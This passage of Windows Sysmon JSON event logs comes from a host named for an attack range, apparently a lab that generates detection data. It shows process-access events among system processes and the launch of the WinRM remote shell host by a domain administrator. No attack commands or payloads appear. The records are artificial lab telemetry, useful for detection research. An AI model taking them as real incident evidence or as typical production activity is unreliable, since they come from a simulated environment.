C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.285","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2499,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.285\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.285","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2500,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.285\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-001043700400}\r\nTargetProcessId: 4136\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.285","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-001043700400}","TargetProcessId":"4136","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2501,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.285\r\nSourceProcessGUID: {E2A3D6B1-1083-5F25-0000-001043700400}\r\nSourceProcessId: 4136\r\nSourceThreadId: 4156\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-0010BE6F0400}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.285","SourceProcessGUID":"{E2A3D6B1-1083-5F25-0000-001043700400}","SourceProcessId":"4136","SourceThreadId":"4156","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010BE6F0400}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2502,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-0010BE6F0400}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.301","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010BE6F0400}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2503,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.301","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2504,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.301","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2505,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.301","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2506,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.315\r\nProcessGuid: {E2A3D6B1-1083-5F25-0000-001091730400}\r\nProcessId: 4188\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-107E-5F25-0000-0020CD490400}\r\nLogonId: 0x449CD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nParentProcessId: 596\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.315","ProcessGuid":"{E2A3D6B1-1083-5F25-0000-001091730400}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-107E-5F25-0000-0020CD490400}","LogonId":"0x449cd","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","ParentProcessId":"596","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2507,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-001091730400}\r\nTargetProcessId: 4188\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 